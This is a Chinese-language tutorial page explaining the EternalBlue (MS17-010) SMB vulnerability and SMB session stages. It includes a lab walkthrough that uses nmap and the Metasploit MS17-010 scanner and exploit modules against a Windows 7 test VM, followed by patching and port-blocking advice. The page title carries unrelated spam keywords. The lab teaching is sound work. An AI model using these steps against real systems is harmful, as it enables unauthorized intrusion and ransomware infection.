狠狠色丁香婷婷综合尤物/久久精品综合一区二区三区/中国有色金属学报/国产日韩欧美在线观看 - 国产一区二区三区四区五区tv

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

【Web滲透】永恒之藍,勒索病毒的力量來源

admin
2024年1月9日 10:52 本文熱度 720

一:介紹


1.什么是永恒之藍。

永恒之藍(Eternal Blue)爆發于2017年4月14日晚,是一種利用Windows系統的SMB協議漏洞來獲取系統的最高權限,以此來控制被入侵的計算機。甚至于2017年5月12日, 不法分子通過改造“永恒之藍”制作了wannacry勒索病毒,使全世界大范圍
內遭受了該勒索病毒,甚至波及到學校、大型企業、政府等機構,只能通過支付高額的贖金才能恢復出文件。不過在該病毒出來不久就被微軟通過打補丁修復。


2.SMB協議介紹。

SMB(ServerMessage Block)通信協議是微軟(Microsoft)和英特爾(Intel)在1987年制定的協議,主要是作為Microsoft網絡的通訊協議。SMB 是在會話層(session layer)和表示層(presentation layer)以及小部分應用層(application layer)的協議。SMB使用了NetBIOS的應用程序接口 (Application Program Interface,簡稱API),一般端口使用為139,445。


3.SMB會話生命階段。

1) SMB協議協商(Negotiate)

在一個SMB還沒有開始的時候,由客戶端率先發出一個協商請求。在請求中,客戶端會列出所有它所支持協議版本以及所支持的一些特性(比如加密Encryption、持久句柄Persistent Handle、客戶端緩存Leasing等等)。而服務端在回復中則會指定一個SMB版本且列出客戶端與服務端共同支持的特性。


2)建立SMB會話(Session Setup)

客戶端選擇一個服務端支持的協議來進行用戶認證,可以選擇的認證協議一般包括NTLM、Kerberos等。按照選擇的認證協議的不同,這個階段可能會進行一次或多次SESSION_SETOP請求/回復的網絡包交換。


3)連接一個文件分享(Tree Connect)

在會話建立之后,客戶端會發出連接文件分享的請求。源于文件系統的樹形結構,該請求被命名為樹連接(Tree Connect)。以SMB協議的阿里云NAS為例,一般的SMB掛載命令為:net use z: \\XXX.nas.aliyuncs.com\myshare其中的“ \\XXX.nas.aliyuncs.com\myshare”便是我們將要連接的那個文件分享,也便是那棵“樹”。如果在“myshare”中創建有子目錄“abc”,那直接連接“abc”這棵子樹也是可以的:net use z: \\XXX.nas.aliyuncs.com\myshare\abc


4) 文件系統操作

在文件分享連接成功之后,用戶通過SMB客戶端進行真正的對于目標文件分享的業務操作。這個階段可以用到的指令有CREATE、CLOSE、FLUSH、READ、WRITE、SETINFO、GETINFO等等。


5)斷開文件分享連接(Tree Disconnect)

當一個SMB會話被閑置一定時間之后,Windows會自動斷開文件分享連接并隨后中止SMB會話。這個閑置時間可以通過Windows注冊表進行設定。當然,用戶也可以主動發起斷開連接請求。


6)終止SMB會話(Logoff)

當客戶端發出會話中止請求并得到服務端發回的中止成功的回復之后,這個SMB會話至此便正式結束了。


二.實驗環境。


1.環境介紹。

攻擊機:kali:ip:192.168.248.128
靶機:windows7專業版:ip:192.168.248.130


2.工具介紹:

Metasploit:

Metasploit框架(簡稱MSF)是一個開源工具,旨在方便滲透測試,它是由Ruby程序語言編 寫的模板化框架,具有很好的擴展性,便于滲透測試人員開發,使用定制的工具模板。該工具有六個模塊,分別為輔助模塊(auxiliary)、滲透攻擊模塊(exploits)、后滲透攻擊模塊(post)、攻擊載荷模塊(payloads)、空指令模塊(nops)、編碼器模塊(encoders),其中msf為總模塊,其他均為分支模塊。此工具集成在kali中。其中auxiliary/scanner/smb/smb_ms17_010是永恒之藍掃描模塊,exploit/windows/smb/ms17_010_eternalblue是永恒之藍攻擊代碼,一般配合使用,前者先掃描,若顯示有漏洞,再進行攻擊。


三.實驗步驟。


1.確定連通

用kali中ping命令測試。


2.查看靶機開放端口。

nmap -r 192.168.248.130

確定端口開放。


3.進入msf。

1)使用auxiliary模塊。

use auxiliary/scanner/smb/smb_ms17_010

2)查看需要配置的信息

show  options

3)設置攻擊目標及端口

set rhosts 192.168.248.130
set rport 445

經測試后發現存在漏洞。

4)使用exploit/windows/smb/ms17_010_eternalblue進行攻擊。

use exploit/windows/smb/ms17_010_eternalblue

至此漏洞利用結束。

三.永恒之藍防護

1)禁用SMB協議

2)打開Windows Update,或手動安裝補丁

3)使用防火墻阻止445端口的連接,或者使用進/出站規則阻止445端口的連接

4)不要隨意打開陌生的文件

4)安裝殺毒軟件,及時更新病毒庫


該文章在 2024/12/16 11:03:56 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved